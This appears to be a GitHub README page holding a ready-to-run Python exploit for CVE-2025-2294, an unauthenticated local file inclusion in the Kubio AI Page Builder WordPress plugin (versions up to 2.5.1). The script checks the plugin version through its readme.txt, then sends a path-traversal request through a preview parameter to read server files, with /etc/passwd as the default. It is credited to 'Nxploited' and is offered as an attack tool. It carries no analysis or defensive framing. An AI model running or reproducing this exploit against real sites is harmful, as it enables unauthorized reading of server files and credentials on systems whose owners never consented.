README.md
Rendering markdown...
import requests
import argparse
import time
session = requests.Session()
requests.packages.urllib3.disable_warnings()
session.verify = False
banner = """
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@ @@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@@ @@! @@@ @@!@!
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ @!@ !@! @!@ !@!!@!
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ !!@ !!@ !!@!!@!! @!! @!!
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!: !!: !!@!!! !!! !@!
:!! :!: !!: !!: !:! !!:! !!! !:! !:! !:! !:! !!! :!!:!:!!:
:!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: !:! !:::!!:::
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: ::::: :: ::::: ::::: :: :::
:: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : :: : ::: :: : ::: : : : :::
By: Nxploited | Khaled Alenazi
"""
def fetch_readme(url):
target = f"{url}/wp-content/plugins/kubio/readme.txt"
try:
response = session.get(target, timeout=10)
response.raise_for_status()
return response.text
except requests.HTTPError as http_err:
print(f"[-] HTTP error occurred: {http_err}")
except requests.RequestException as req_err:
print(f"[-] Request error occurred: {req_err}")
return None
def is_vulnerable(readme_content):
for line in readme_content.splitlines():
if "Stable tag:" in line:
version = line.split(":")[-1].strip()
parts = version.split(".")
if len(parts) == 3:
major, minor, patch = map(int, parts)
if (major, minor, patch) <= (2, 5, 1):
print("[+] Target is vulnerable. Exploiting...")
time.sleep(3)
return True
break
return False
def build_exploit_url(url, target_file):
return f"{url}/?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template={target_file}"
def send_exploit_request(full_url):
try:
response = session.get(full_url, timeout=10)
response.raise_for_status()
return response.text
except requests.HTTPError as http_err:
print(f"[-] HTTP error occurred: {http_err}")
except requests.RequestException as req_err:
print(f"[-] Request error occurred: {req_err}")
return None
def display_result(content):
if content:
print("[+] Exploit successful. File content:")
print(content)
else:
print("[-] Exploit failed or file not readable.")
def exploit(target_url, file_to_read):
readme = fetch_readme(target_url)
if readme and is_vulnerable(readme):
exploit_url = build_exploit_url(target_url, file_to_read)
result = send_exploit_request(exploit_url)
display_result(result)
else:
print("[-] Target is not vulnerable or readme.txt not accessible.")
if __name__ == "__main__":
print(banner)
parser = argparse.ArgumentParser(description="Exploit for CVE-2025-2294 Kubio AI Page Builder <= 2.5.1 - Unauthenticated Local File Inclusion # By:Nxploited Khaled Alenazi")
parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., https://example.com)")
parser.add_argument("-f", "--file", default="../../../../../../../../etc/passwd", help="File to read (default: /etc/passwd)")
args = parser.parse_args()
exploit(args.url.rstrip("/"), args.file)